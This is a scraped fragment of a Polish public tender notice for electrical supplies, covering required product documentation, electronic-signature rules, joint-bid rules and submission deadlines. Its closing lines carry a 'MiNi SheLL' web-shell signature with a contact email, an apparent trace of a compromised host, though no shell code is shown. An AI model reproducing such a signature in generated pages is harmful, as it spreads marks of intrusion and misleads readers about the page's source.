dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawcy ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do składanej oferty przedmiotowe środki dowodowe potwierdzające, że oferowana dostawa spełnia określone przez Zamawiającego wymagania, cechy i kryteria.<br/>1.	Wykaz przedmiotowych środków dowodowych, które należy dołączyć do oferty:<br/>1.1.	Dla niżej wymienionych pozycji asortymentowych, wyszczególnionych także w formularzu asortymentowo-cenowym (załącznik nr 1.1 do SWZ) – Wykonawca ma obowiązek dołączyć do oferty dokumenty (przedmiotowe środki dowodowe), potwierdzające parametry oferowanego produktu, to jest deklaracje zgodności z CE, karty techniczne, karty charakterystyki, karty katalogowe, wydruki ze strony internetowej producenta lub inne równoważne dokumenty zawierające opis oferowanego produktu, potwierdzające zgodność wymaganych parametrów zgodnie z załącznikiem 1B do SWZ. Dokumenty te mają być opisane w sposób nie budzący wątpliwości do jakiego asortymentu są dedykowane: <br/>1)	poz. 1– Elektrozaczep rewersyjny 1411 12V DC,<br/>2)	poz. 2– Elektrozaczep rewersyjny 1411 RF12V DC,<br/>3)	poz. 3– Elektrozaczep zwykły 1410 12-24V AC/DC,<br/>4)	poz. 33– Oprawa LED biała, kwadratowa 24x24x8mm,<br/>5)	poz. 34– Oprawa LED biała, kwadratowa 30x30x8mm,<br/>6)	poz. 39– Oprawa LED rastrowa natynkowa 2x120cm,<br/>7)	poz. 40– Oprawa LED rastrowa natynkowa, 4x60cm, 60x60cm T8,<br/>8)	poz. 41– Oprawa LED rastrowa, podtynkowa 4x60cm, 60x60cm T8,<br/>9)	poz. 42– Panel Led 3200Lm 40W 120x30 z ramką N/T,<br/>10)	poz. 43– Panel Led 3200Lm 40W 60x60 z ramką NT,<br/>11)	poz. 47– Przedłużacz bębnowy 25 metrów, 4 gniazda 230 z klapką,<br/>12)	poz. 48– Przedłużacz bębnowy 30 metrów, 4 gniazda 230 z klapką,<br/>13)	poz. 49– Przedłużacz bębnowy 50 metrów, 4 gniazda 230 z klapką,<br/>14)	poz. 74– Rozdzielnica hermetyczna RH-12,<br/>15)	poz. 75– Rozdzielnica hermetyczna RH-24,<br/>16)	poz. 76– Rozdzielnica hermetyczna RH-6,<br/>17)	poz. 77– Rozdzielnica hermetyczna RH-8,<br/>18)	poz. 80– Świetlówka 18W,<br/>19)	poz. 81– Świetlówka 18W,<br/>20)	poz. 82– Świetlówka 36W,<br/>21)	poz. 83– Świetlówka 16W,<br/>22)	poz. 90 – Wyłącznik różnicowoprądowy,<br/>23)	poz. 91– Wyłącznik różnicowoprądowy,<br/>24)	poz. 92– Wyłącznik różnicowoprądowy,<br/>25)	poz. 93 –Wyłącznik nadprądowy,<br/>26)	poz. 94 –Wyłącznik nadprądowy,<br/>27)	poz. 108 – Żarówka LED 8-9W,<br/>28)	poz. 109 – Żarówka LED 13-15W,<br/>29)	poz. 110 – Żarówka LED 18-19W,<br/>30)	poz. 111 – Żarówka LED E14 8 W,<br/>31)	poz. 112 – Żarówka LED D18W/840,<br/>32)	poz. 113 – Żarówka LED 7W, E14,<br/>1.2.	Zamawiający informuje, iż zastrzega możliwość zwrócenia się do producenta lub przedstawiciela producenta o potwierdzenie parametrów technicznych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> DO OFERTY NALEŻY DOŁĄCZYĆ: <br/>10.1. Formularz ofertowy w postaci elektronicznej (załącznik nr 1 do SWZ) – odpowiednio wypełniony i podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do reprezentowania wykonawcy. Formularz ofertowy (oferta), zgodnie z art. 63 ust. 2 PZP, składa się pod rygorem nieważności w formie elektronicznej, tzn. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>10.2. Formularz asortymentowo-cenowy w postaci elektronicznej (załącznik nr 1.1 do SWZ) – odpowiednio wypełniony i podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do reprezentowania wykonawcy. Formularz asortymentowo-cenowy (oferta), zgodnie z art. 63 ust. 2 PZP, składa się pod rygorem nieważności w formie elektronicznej, tzn. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>10.3. Przedmiotowe środki dowodowe w postaci elektronicznej wskazane w Rozdziale VII SWZ – podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>10.4. Oświadczenie o niepodleganiu wykluczeniu z postępowania w postaci elektronicznej (załącznik nr 3 do SWZ), o którym mowa w art. 125 ust. 1 PZP, aktualne na dzień składania ofert. Oświadczenie o niepodleganiu wykluczeniu, zgodnie z art. 63 ust. 2 PZP, składa się pod rygorem nieważności w formie elektronicznej, tzn. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>10.5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy to również wykonawców prowadzących działalność gospodarczą w formie spółki cywilnej): <br/>10.5.1. Pełnomocnictwo w postaci elektronicznej dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu (podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/>10.5.2. Oświadczenie o podziale obowiązków w postaci elektronicznej (załącznik nr 4 do SWZ), z którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy – przekazuje się razem z ofertą podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>10.5.3. Oświadczenie o niepodleganiu wykluczeniu z postępowania w postaci elektronicznej (załącznik nr 3 do SWZ), o którym mowa w pkt 10.4, składa każdy spośród wykonawców wspólnie ubiegających się o zamówienie – podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>10.5.4. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>10.5.5. Wspólnicy spółki cywilnej są traktowani jak wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>10.6. Pełnomocnictwo upoważniające do złożenia oferty – o ile ofertę składa pełnomocnik (podpisane zgodnie z informacją zawartą w pkt 5.2.)<br/>10.7. Ofertę i oświadczenie, o którym mowa w art. 125 PZP, zaleca się sporządzić na drukach stanowiących załączniki do SWZ. <br/>10.8. Oferta oraz oświadczenia muszą być złożone w oryginale.<br/>11.	Uzupełnianie i wyjaśnianie oświadczeń i dokumentów<br/>11.1. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9.	Oferta składana przez podmioty występujące wspólnie. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 ustawy PZP, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu Wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym). W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/>10.5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy to również wykonawców prowadzących działalność gospodarczą w formie spółki cywilnej): <br/>10.5.1. Pełnomocnictwo w postaci elektronicznej dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu (podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/>10.5.2. Oświadczenie o podziale obowiązków w postaci elektronicznej (załącznik nr 4 do SWZ), z którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy – przekazuje się razem z ofertą podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>10.5.3. Oświadczenie o niepodleganiu wykluczeniu z postępowania w postaci elektronicznej (załącznik nr 3 do SWZ), o którym mowa w pkt 10.4, składa każdy spośród wykonawców wspólnie ubiegających się o zamówienie – podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>10.5.4. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>10.5.5. Wspólnicy spółki cywilnej są traktowani jak wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę za pośrednictwem portalu platformazakupowa.pl. Sposób składania oferty został określony w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. 2. Po wypełnieniu Formularza składania oferty i załadowaniu wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com